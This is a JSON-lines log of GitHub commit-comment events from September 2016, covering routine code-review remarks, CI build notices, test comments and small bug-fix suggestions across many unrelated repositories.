{"id":"4617489074","type":"CommitCommentEvent","actor":{"login":"tobi5648"},"repo":{"name":"Mara-AspIT/hello-world"},"payload":{"comment":{"id":19171503,"position":null,"line":null,"path":null,"commit_id":"a286589b8723b5ee583f15b2860f59d318864d60","created_at":"2016-09-26T12:33:36Z","updated_at":"2016-09-26T12:33:36Z","body":"Det ser det ud til at jeg ihvertfald godt kan"}},"created_at":"2016-09-26T12:33:36Z"}
{"id":"4617489091","type":"CommitCommentEvent","actor":{"login":"jacob4684"},"repo":{"name":"Mara-AspIT/GameCharacter"},"payload":{"comment":{"id":19171504,"position":null,"line":null,"path":null,"commit_id":"bc3682bc8f99c6499b777c9e8ca6b23950533f93","created_at":"2016-09-26T12:33:36Z","updated_at":"2016-09-26T12:33:36Z","body":"test"}},"created_at":"2016-09-26T12:33:36Z"}
{"id":"4617491909","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171515,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:34:14Z","updated_at":"2016-09-26T12:34:14Z","body":"I forgot about the mtdArn in the URL. But what if you supply an mtdArn other than your own?"}},"created_at":"2016-09-26T12:34:14Z"}
{"id":"4617492242","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19171519,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T12:34:18Z","updated_at":"2016-09-26T12:34:18Z","body":"If so, this else clause should implement hiding the legend when Google Earth is used as the base layer, as the legend does not function in this mode\r\n\r\n```\r\nelse if (this.layersService.selectedBaseLayer.key === IsraelHiking.Services.Layers.LayersService.GOOGLE_EARTH) {\r\n    // TODO: Hide the legend\r\n}\r\n```\r\n\r\nThe improved legend examples that @valleyofdawn requested are already checked-in 007bacbbf2129e48b7bb933c08ce88b6ad340fe2"}},"created_at":"2016-09-26T12:34:18Z"}
{"id":"4617493091","type":"CommitCommentEvent","actor":{"login":"tbl73"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":19171524,"position":8,"line":60,"path":"app/controllers/collection_controller.rb","commit_id":"983a23acd4e3f700a1b0dac14a8522e383285ce2","created_at":"2016-09-26T12:34:30Z","updated_at":"2016-09-26T12:34:30Z","body":"Oops!  Yep, I'll get rid of that!"}},"created_at":"2016-09-26T12:34:30Z"}
{"id":"4617494055","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"Mara-AspIT/hello-world"},"payload":{"comment":{"id":19171526,"position":null,"line":null,"path":null,"commit_id":"b4e9bcee9b1eb7e9b19df4eb179bfd4768c90f2e","created_at":"2016-09-26T12:34:43Z","updated_at":"2016-09-26T12:34:43Z","body":"t"}},"created_at":"2016-09-26T12:34:43Z"}
{"id":"4617494837","type":"CommitCommentEvent","actor":{"login":"tbl73"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":19171529,"position":5,"line":57,"path":"app/controllers/collection_controller.rb","commit_id":"983a23acd4e3f700a1b0dac14a8522e383285ce2","created_at":"2016-09-26T12:34:53Z","updated_at":"2016-09-26T12:34:53Z","body":"Okay, I'll check that out."}},"created_at":"2016-09-26T12:34:53Z"}
{"id":"4617495452","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19171530,"position":null,"line":null,"path":null,"commit_id":"bb78f770615b2f2d606185bb51c6326532b81f57","created_at":"2016-09-26T12:35:01Z","updated_at":"2016-09-26T12:35:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aUCpYIQSTDeQ4bQD3HnH7w"}},"created_at":"2016-09-26T12:35:01Z"}
{"id":"4617496569","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19171532,"position":23,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-26T12:35:15Z","updated_at":"2016-09-26T12:35:15Z","body":"|`line 46`|\n|---|\nAgain, method with default has its cost, which I don't want to pay. And in this particular case the omitted parameter allows to implement method with less steps."}},"created_at":"2016-09-26T12:35:15Z"}
{"id":"4617496630","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19171533,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-26T12:35:16Z","updated_at":"2016-09-26T12:35:16Z","body":"Doh. Sorry."}},"created_at":"2016-09-26T12:35:16Z"}
{"id":"4617499212","type":"CommitCommentEvent","actor":{"login":"boybook"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":19171537,"position":null,"line":null,"path":null,"commit_id":"503fdd3a4afcc4eec88fedc9c4357d3b356c805d","created_at":"2016-09-26T12:35:49Z","updated_at":"2016-09-26T12:35:49Z","body":"[https://youtu.be/TfGUFinwDYM](url)"}},"created_at":"2016-09-26T12:35:49Z"}
{"id":"4617500362","type":"CommitCommentEvent","actor":{"login":"irl"},"repo":{"name":"mami-project/pathspider"},"payload":{"comment":{"id":19171540,"position":null,"line":null,"path":null,"commit_id":"2bc6c8444161e016569499d1d817e73549ebbd69","created_at":"2016-09-26T12:36:05Z","updated_at":"2016-09-26T12:36:05Z","body":"something else was accessing the tstart and tstop and throwing type errors, but i can't remember what it was."}},"created_at":"2016-09-26T12:36:05Z"}
{"id":"4617500709","type":"CommitCommentEvent","actor":{"login":"tobi5648"},"repo":{"name":"Mara-AspIT/hello-world"},"payload":{"comment":{"id":19171541,"position":2,"line":2,"path":"README.md","commit_id":"a286589b8723b5ee583f15b2860f59d318864d60","created_at":"2016-09-26T12:36:10Z","updated_at":"2016-09-26T12:36:10Z","body":"Det skulle jeg gerne kunne"}},"created_at":"2016-09-26T12:36:10Z"}
{"id":"4617501841","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19171546,"position":null,"line":null,"path":null,"commit_id":"d58f499df3ba9858536348f42e930cec70623289","created_at":"2016-09-26T12:36:24Z","updated_at":"2016-09-26T12:36:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PtHzLy-4TFmw8xVvNXbJIQ"}},"created_at":"2016-09-26T12:36:24Z"}
{"id":"4617510384","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19171573,"position":null,"line":null,"path":null,"commit_id":"5361640ae142ccf974cbd92764e8b0f1b32727a1","created_at":"2016-09-26T12:38:12Z","updated_at":"2016-09-26T12:38:12Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MTcPJI_jTXCOlFPS4EXCBA"}},"created_at":"2016-09-26T12:38:12Z"}
{"id":"4617510582","type":"CommitCommentEvent","actor":{"login":"bakrpx"},"repo":{"name":"spatie/laravel-medialibrary"},"payload":{"comment":{"id":19171574,"position":87,"line":138,"path":"src/FileManipulator.php","commit_id":"48ed0b42fb1f3a0aa54000f64a16ac4fd68e2ed5","created_at":"2016-09-26T12:38:14Z","updated_at":"2016-09-26T12:38:14Z","body":" Hi , @freekmurze\r\nhere you are always using $media->getPath() bur we are using s3 , there will no getPath method in the URL  generator\r\nThanks \r\n"}},"created_at":"2016-09-26T12:38:14Z"}
{"id":"4617513683","type":"CommitCommentEvent","actor":{"login":"mronian"},"repo":{"name":"timholy/Images.jl"},"payload":{"comment":{"id":19171582,"position":null,"line":null,"path":null,"commit_id":"d36527fde6bed796bfe05692ad16f7a9292fc051","created_at":"2016-09-26T12:38:53Z","updated_at":"2016-09-26T12:38:53Z","body":"Yes. If there is a checkerboard with red and green squares (all having same luminance), the corners should be detected which probably won't happen with what we had earlier. This discussion also got me reading up on edge detection methods for colour images which are much better (same goes for feature detection) which I'd like to contribute in the winter break (around December). "}},"created_at":"2016-09-26T12:38:53Z"}
{"id":"4617515831","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19171585,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T12:39:21Z","updated_at":"2016-09-26T12:39:21Z","body":"yeah, the dev enviroment proxspace is old.  Sad there is not git in it.\r\nThis was another reason for me to bring the docker container online."}},"created_at":"2016-09-26T12:39:21Z"}
{"id":"4617523925","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-media"},"payload":{"comment":{"id":19171609,"position":118,"line":672,"path":"src/android/AudioPlayer.java","commit_id":"9c0b79043046620773c49c8b576984391df432e1","created_at":"2016-09-26T12:41:00Z","updated_at":"2016-09-26T12:41:00Z","body":"What this `catch` is intended to catch? Is `JSONObject.put()` might produce any exceptions?"}},"created_at":"2016-09-26T12:41:00Z"}
{"id":"4617525164","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171612,"position":null,"line":null,"path":null,"commit_id":"01ccfd77505966a1e6d416a18f017f4f8c2af9c0","created_at":"2016-09-26T12:41:15Z","updated_at":"2016-09-26T12:41:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1163](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14245&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T12:41:15Z"}
{"id":"4617527460","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19171614,"position":8,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-26T12:41:43Z","updated_at":"2016-09-26T12:41:43Z","body":"|`line 13`|\n|---|\nyes, we should make it a constant. Seems that we won't be able to change its value later."}},"created_at":"2016-09-26T12:41:43Z"}
{"id":"4617527853","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19171615,"position":9,"line":1318,"path":"Source/JavaScriptCore/CMakeLists.txt","commit_id":"4de007e55acb7b25c617233cb19b73d4900403e3","created_at":"2016-09-26T12:41:48Z","updated_at":"2016-09-26T12:41:48Z","body":"OR SHARED_CORE"}},"created_at":"2016-09-26T12:41:48Z"}
{"id":"4617528879","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19171616,"position":12,"line":1321,"path":"Source/JavaScriptCore/CMakeLists.txt","commit_id":"4de007e55acb7b25c617233cb19b73d4900403e3","created_at":"2016-09-26T12:42:02Z","updated_at":"2016-09-26T12:42:02Z","body":"?"}},"created_at":"2016-09-26T12:42:02Z"}
{"id":"4617531657","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-media"},"payload":{"comment":{"id":19171622,"position":129,"line":679,"path":"src/android/AudioPlayer.java","commit_id":"9c0b79043046620773c49c8b576984391df432e1","created_at":"2016-09-26T12:42:36Z","updated_at":"2016-09-26T12:42:36Z","body":"What is the purpose of this `try {} catch {}`? Looks like in the `catch` block you will catch the exception, produced inside of `try` block? Is this intentional?"}},"created_at":"2016-09-26T12:42:36Z"}
{"id":"4617537228","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19171637,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-26T12:43:45Z","updated_at":"2016-09-26T12:43:45Z","body":"I accidentally found out that we actually have libcpupower in Ubuntu 16.10:\r\n```\r\nmonsta@yakkety:~$ dpkg -L linux-tools-4.8.0-16 | grep libcpupower\r\n/usr/lib/libcpupower.so.4.8.0-16\r\n```\r\nYes, some genius placed it inside this ```linux-tools-<kernel_version>``` package instead of making a separate ```libcpupower``` package like it was done in Debian Unstable.\r\nAnyway, only this file is available, so I had to create a symlink so that the ```--with-cpufreq-lib=cpupower``` flag would work:\r\n```\r\nmonsta@yakkety:~$ sudo ln -s /usr/lib/libcpupower.so.4.8.0-16 /usr/lib/libcpupower.so\r\n```\r\nYes, we don't have a -dev package for that. Nice.\r\n\r\nSo now build with the ```--with-cpufreq-lib=cpupower``` flag works, but I can't finish building the package:\r\n```\r\ndpkg-shlibdeps: error: no dependency information found for /usr/lib/libcpupower.so.4.8.0-16 (used by debian/mate-applets/usr/lib/mate-applets/mate-cpufreq-applet)\r\nHint: check if the library actually comes from a package.\r\ndh_shlibdeps: dpkg-shlibdeps -Tdebian/mate-applets.substvars debian/mate-applets/usr/bin/mate-cpufreq-selector debian/mate-applets/usr/lib/mate-applets/mate-netspeed-applet debian/mate-applets/usr/lib/mate-applets/trashapplet debian/mate-applets/usr/lib/mate-applets/timer-applet debian/mate-applets/usr/lib/mate-applets/mate-multiload-applet debian/mate-applets/usr/lib/mate-applets/accessx-status-applet debian/mate-applets/usr/lib/mate-applets/mateweather-applet debian/mate-applets/usr/lib/mate-applets/stickynotes-applet debian/mate-applets/usr/lib/mate-applets/mate-geyes-applet debian/mate-applets/usr/lib/mate-applets/mate-cpufreq-applet debian/mate-applets/usr/lib/mate-applets/command-applet debian/mate-applets/usr/lib/mate-applets/battstat-applet debian/mate-applets/usr/lib/mate-applets/mate-drivemount-applet debian/mate-applets/usr/lib/mate-applets/mate-charpick-applet returned exit code 2\r\ndebian/rules:10: recipe for target 'binary' failed\r\nmake: *** [binary] Error 2\r\ndpkg-buildpackage: error: fakeroot debian/rules binary gave error exit status 2\r\n```\r\n\r\nWell, it was a hackish attempt anyway."}},"created_at":"2016-09-26T12:43:45Z"}
{"id":"4617538401","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-media"},"payload":{"comment":{"id":19171640,"position":128,"line":678,"path":"src/android/AudioPlayer.java","commit_id":"9c0b79043046620773c49c8b576984391df432e1","created_at":"2016-09-26T12:44:00Z","updated_at":"2016-09-26T12:44:00Z","body":"I thought we've agreed to not modify this method signature in favor of moving all error processing logic to `sendErrorStatus`?"}},"created_at":"2016-09-26T12:44:00Z"}
{"id":"4617539751","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19171643,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T12:44:17Z","updated_at":"2016-09-26T12:44:17Z","body":"That sounds like an issue in ember-cli-deploy or ember-cli, since the files come over automatically https://github.com/knownasilya/ember-cli-deploy-gcloud-storage/blob/master/index.js#L20"}},"created_at":"2016-09-26T12:44:17Z"}
{"id":"4617539956","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-media"},"payload":{"comment":{"id":19171644,"position":143,"line":691,"path":"src/android/AudioPlayer.java","commit_id":"9c0b79043046620773c49c8b576984391df432e1","created_at":"2016-09-26T12:44:20Z","updated_at":"2016-09-26T12:44:20Z","body":"See https://github.com/matrosovN/cordova-plugin-media/commit/9c0b79043046620773c49c8b576984391df432e1#commitcomment-19171640"}},"created_at":"2016-09-26T12:44:20Z"}
{"id":"4617540310","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171645,"position":null,"line":null,"path":null,"commit_id":"8be58ff82704ce5f16ae9230ab609eb27e2c7c39","created_at":"2016-09-26T12:44:25Z","updated_at":"2016-09-26T12:44:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1162](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14243&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:14:30"}},"created_at":"2016-09-26T12:44:25Z"}
{"id":"4617540433","type":"CommitCommentEvent","actor":{"login":"RundRundus"},"repo":{"name":"meemsbror/DAT255"},"payload":{"comment":{"id":19171647,"position":null,"line":null,"path":null,"commit_id":"d1153045084c91f174857e507fb0d1ddebf077be","created_at":"2016-09-26T12:44:26Z","updated_at":"2016-09-26T12:44:26Z","body":"tack <3"}},"created_at":"2016-09-26T12:44:26Z"}
{"id":"4617540680","type":"CommitCommentEvent","actor":{"login":"exploitagency"},"repo":{"name":"mattaereal/proxmark3"},"payload":{"comment":{"id":19171648,"position":null,"line":null,"path":null,"commit_id":"2e1cfe34b14d57a535d3198eacfa2711dc28adda","created_at":"2016-09-26T12:44:28Z","updated_at":"2016-09-26T12:44:28Z","body":"I get the compile error on Kali 2016\r\n\r\nmifarecmd.c: In function 'saMifareChkKeys':\r\nmifarecmd.c:905:6: error: 'i' may be used uninitialized in this function [-Werror=maybe-uninitialized]\r\ncc1: all warnings being treated as errors\r\n\r\nI know I can set the compiler to ignore this but others may not know.\r\nAnd I am sure you know why, but you defined \"int i;\" although you didn't initialize it with a value, I know you initialized it in your FOR loop but outside the FOR loop there is an IF statement and that is what the compiler is catching it.  If I am not mistaken\r\n\r\nBelow is the code from mifarecmd.c\r\n\r\nint saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, uint8_t keyCount, uint8_t * datain, uint64_t *key) {\r\n\r\n\r\n\r\n\t//hard config\r\n\r\n\tuint8_t retries = 5;\r\n\r\n\tbool retry = true;\r\n\r\n\r\n\r\n\tuint64_t ui64Key = 0;\r\n\r\n\tint i;\r\n\r\n\tbyte_t isOK = 0;\r\n\r\n\r\n\r\nHere is my suggestion\r\n\r\nint saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, uint8_t keyCount, uint8_t * datain, uint64_t *key) {\r\n\r\n\r\n\r\n\t//hard config\r\n\r\n\tuint8_t retries = 5;\r\n\r\n\tbool retry = true;\r\n\r\n\r\n\r\n\tuint64_t ui64Key = 0;\r\n\r\n\tint i = 0;\r\n\r\n\tbyte_t isOK = 0;\r\n\r\n\r\nShouldn't break anything right?  Not from what I can tell. I am making that change then I am including your firmware from this commit in my repo of precompiled firmware so everyone can enjoy it, thank you for the hard work\r\nhttp://exploit.agency/sploit/proxmark3_with-LF_standalone/"}},"created_at":"2016-09-26T12:44:28Z"}
{"id":"4617541983","type":"CommitCommentEvent","actor":{"login":"makooooy123"},"repo":{"name":"makooooy123/EE_180_Activity_1"},"payload":{"comment":{"id":19171650,"position":null,"line":null,"path":null,"commit_id":"a8a06f26233e32856cee100d941af0d91fafa47d","created_at":"2016-09-26T12:44:46Z","updated_at":"2016-09-26T12:44:46Z","body":"Schematic Diagram :)"}},"created_at":"2016-09-26T12:44:46Z"}
{"id":"4617542944","type":"CommitCommentEvent","actor":{"login":"stochal"},"repo":{"name":"ad8454/Hand-Detection-AR"},"payload":{"comment":{"id":19171651,"position":null,"line":null,"path":null,"commit_id":"a6915ee6d3c1e7b7459c6d94fd2b722becea82c6","created_at":"2016-09-26T12:44:58Z","updated_at":"2016-09-26T12:44:58Z","body":"Dear Sir, \r\n\r\nI don't find how contact you about your github project, but i send a mail at www.cs.rit.edu to have your contact information and  viceversa.\r\nI contact you about https://github.com/ad8454/Hand-Detection-AR . i need a detection' system like in your project, but not for hand just for nail.\r\nI know java & i'm beginning to learn OpenCV with your code, for that, i must comment all your code's line to understand well your logic and operation of hand detection.\r\nMaybe have you a comment's version of your project or maybe can you help to do this. if u don't want help me or maybe u have not the time to, can u correct my comment if i send you your project with my comments ?\r\n\r\nSorry, my bad english, thanks for your reply & for your job's share.\r\n\r\nbest regards,\r\n\r\nNaveska Paul\r\n "}},"created_at":"2016-09-26T12:44:58Z"}
{"id":"4617544395","type":"CommitCommentEvent","actor":{"login":"Amarlanda"},"repo":{"name":"Amarlanda/AmarsProject"},"payload":{"comment":{"id":19171657,"position":null,"line":null,"path":null,"commit_id":"c8d8a0b5d506a95d01f1a20fcee5b2aa685f436a","created_at":"2016-09-26T12:45:16Z","updated_at":"2016-09-26T12:45:16Z","body":"Comment"}},"created_at":"2016-09-26T12:45:16Z"}
{"id":"4617545002","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19171660,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T12:45:24Z","updated_at":"2016-09-26T12:45:24Z","body":"Well, the issue is actually on the uploader side. The plugin needs to transform windows path to linux path ( used by google ). Working on a fix now. "}},"created_at":"2016-09-26T12:45:24Z"}
{"id":"4617551070","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19171682,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T12:46:42Z","updated_at":"2016-09-26T12:46:42Z","body":"So this is what I did :\r\n```javascript\r\n      if (path.sep === \"\\\\\") {        \r\n        destinationFilePath = destinationFilePath.replace(/\\\\/g, \"/\")\r\n      }\r\n```\r\n\r\njust after \r\n```javascript\r\n    return new Promise(function (resolve, reject) {\r\n      var destinationFilePath = config.bucketFolder ? path.join(config.bucketFolder, filePath) : filePath;\r\n```\r\n"}},"created_at":"2016-09-26T12:46:42Z"}
{"id":"4617551279","type":"CommitCommentEvent","actor":{"login":"Adam198590"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19171684,"position":19,"line":19,"path":"src/main/java/util/ByteUtil.java","commit_id":"962f0b27637c16fb982f10bddc010604707d9689","created_at":"2016-09-26T12:46:45Z","updated_at":"2016-09-26T12:46:45Z","body":"fixed"}},"created_at":"2016-09-26T12:46:45Z"}
{"id":"4617552052","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19171686,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T12:46:55Z","updated_at":"2016-09-26T12:46:55Z","body":"Do you want me to push pullrequest ?\r\n"}},"created_at":"2016-09-26T12:46:55Z"}
{"id":"4617561219","type":"CommitCommentEvent","actor":{"login":"srenatus"},"repo":{"name":"chef-cookbooks/audit"},"payload":{"comment":{"id":19171706,"position":13,"line":39,"path":"libraries/report.rb","commit_id":"cb5528baede582a5d44213c4bcb4b856958f0f3a","created_at":"2016-09-26T12:48:48Z","updated_at":"2016-09-26T12:48:48Z","body":"```\r\nirb(main):001:0> nil.to_i\r\n=> 0\r\n```\r\n...what a fancy way to say `0` ;)"}},"created_at":"2016-09-26T12:48:48Z"}
{"id":"4617563261","type":"CommitCommentEvent","actor":{"login":"arunkumarkindegene"},"repo":{"name":"arunkumarkindegene/counter"},"payload":{"comment":{"id":19171719,"position":null,"line":null,"path":null,"commit_id":"d15c1116e5101ed5b0441e443cd7f66c9309149e","created_at":"2016-09-26T12:49:12Z","updated_at":"2016-09-26T12:49:12Z","body":"Upload to files"}},"created_at":"2016-09-26T12:49:12Z"}
{"id":"4617564527","type":"CommitCommentEvent","actor":{"login":"11digitlabs"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19171722,"position":9,"line":72,"path":"controller/client.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-26T12:49:26Z","updated_at":"2016-09-26T12:49:26Z","body":"There must be something that I'm missing, cause a couple of lines above we are using the init function for the donutChart and the tweetsPerMinute/Second.\r\n\r\nInit is there, so I used the same approach"}},"created_at":"2016-09-26T12:49:26Z"}
{"id":"4617568343","type":"CommitCommentEvent","actor":{"login":"11digitlabs"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19171732,"position":5,"line":89,"path":"app.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-26T12:50:14Z","updated_at":"2016-09-26T12:50:14Z","body":"Alright!"}},"created_at":"2016-09-26T12:50:14Z"}
{"id":"4617571399","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19171740,"position":59,"line":219,"path":"src/ucioption.cpp","commit_id":"ef8957d9127cb6de5f7af12d1b908286d8d61810","created_at":"2016-09-26T12:50:50Z","updated_at":"2016-09-26T12:50:50Z","body":"In my experience this tends to be smaller than one should use, especially if the run hasn't a very large number of games, so usually I find it useful to at least double the value..."}},"created_at":"2016-09-26T12:50:50Z"}
{"id":"4617573575","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"dirvine/rfcs"},"payload":{"comment":{"id":19171744,"position":85,"line":85,"path":"0045-relocate-nodes/0045-relocate-nodes.md","commit_id":"062bd3aeabf3a5fa5a9c20e8e1359c0d23ed0019","created_at":"2016-09-26T12:51:17Z","updated_at":"2016-09-26T12:51:17Z","body":"In addition, we should ensure that the group doesn't relocate so many of its members that it has to merge just because of that. In particular, for relocation, probably only _join_ events should be counted, not nodes leaving the group."}},"created_at":"2016-09-26T12:51:17Z"}
{"id":"4617574176","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19171745,"position":null,"line":null,"path":null,"commit_id":"cebb3a4555d977196af098528b174da67afcf1ac","created_at":"2016-09-26T12:51:23Z","updated_at":"2016-09-26T12:51:23Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1041)"}},"created_at":"2016-09-26T12:51:23Z"}
{"id":"4617574269","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19171746,"position":null,"line":null,"path":null,"commit_id":"72185adc91310816b226adbe5bd92c48c62fd917","created_at":"2016-09-26T12:51:25Z","updated_at":"2016-09-26T12:51:25Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1043)"}},"created_at":"2016-09-26T12:51:25Z"}
{"id":"4617576534","type":"CommitCommentEvent","actor":{"login":"whtcubie"},"repo":{"name":"whtcubie/learngit_2016"},"payload":{"comment":{"id":19171748,"position":null,"line":null,"path":null,"commit_id":"f5cd85d24f402be87f0c8a56877dd6a4b1a9a6aa","created_at":"2016-09-26T12:51:50Z","updated_at":"2016-09-26T12:51:50Z","body":"good commit "}},"created_at":"2016-09-26T12:51:50Z"}
{"id":"4617578654","type":"CommitCommentEvent","actor":{"login":"whtcubie"},"repo":{"name":"whtcubie/learngit_2016"},"payload":{"comment":{"id":19171763,"position":4,"line":11,"path":"readme.txt","commit_id":"f5cd85d24f402be87f0c8a56877dd6a4b1a9a6aa","created_at":"2016-09-26T12:52:15Z","updated_at":"2016-09-26T12:52:15Z","body":"vfsdgbxdrh"}},"created_at":"2016-09-26T12:52:15Z"}
{"id":"4617579743","type":"CommitCommentEvent","actor":{"login":"whtcubie"},"repo":{"name":"whtcubie/learngit_2016"},"payload":{"comment":{"id":19171767,"position":4,"line":11,"path":"readme.txt","commit_id":"f5cd85d24f402be87f0c8a56877dd6a4b1a9a6aa","created_at":"2016-09-26T12:52:28Z","updated_at":"2016-09-26T12:52:28Z","body":"sczsvfzgv"}},"created_at":"2016-09-26T12:52:28Z"}
{"id":"4617580876","type":"CommitCommentEvent","actor":{"login":"hobailey"},"repo":{"name":"Mangopay/mangopay2-nodejs-sdk"},"payload":{"comment":{"id":19171771,"position":null,"line":null,"path":null,"commit_id":"b12d4b552535622e69ea94e1abea32e661e5374e","created_at":"2016-09-26T12:52:43Z","updated_at":"2016-09-26T12:52:43Z","body":"@stefanGhivi is this ready to be merged in now?"}},"created_at":"2016-09-26T12:52:43Z"}
{"id":"4617582949","type":"CommitCommentEvent","actor":{"login":"whtcubie"},"repo":{"name":"whtcubie/learngit_2016"},"payload":{"comment":{"id":19171777,"position":4,"line":11,"path":"readme.txt","commit_id":"f5cd85d24f402be87f0c8a56877dd6a4b1a9a6aa","created_at":"2016-09-26T12:53:08Z","updated_at":"2016-09-26T12:53:08Z","body":"3\r\n32\r\n"}},"created_at":"2016-09-26T12:53:08Z"}
{"id":"4617584790","type":"CommitCommentEvent","actor":{"login":"analshahrani"},"repo":{"name":"analshahrani/assignment-1"},"payload":{"comment":{"id":19171782,"position":null,"line":null,"path":null,"commit_id":"8ca7defde9efdf6a94454e5135dd5ca90b67604f","created_at":"2016-09-26T12:53:31Z","updated_at":"2016-09-26T12:53:31Z","body":"![image](https://cloud.githubusercontent.com/assets/21369271/18834935/40ceadc8-83be-11e6-978c-b69a8b80aad6.png)\r\n"}},"created_at":"2016-09-26T12:53:31Z"}
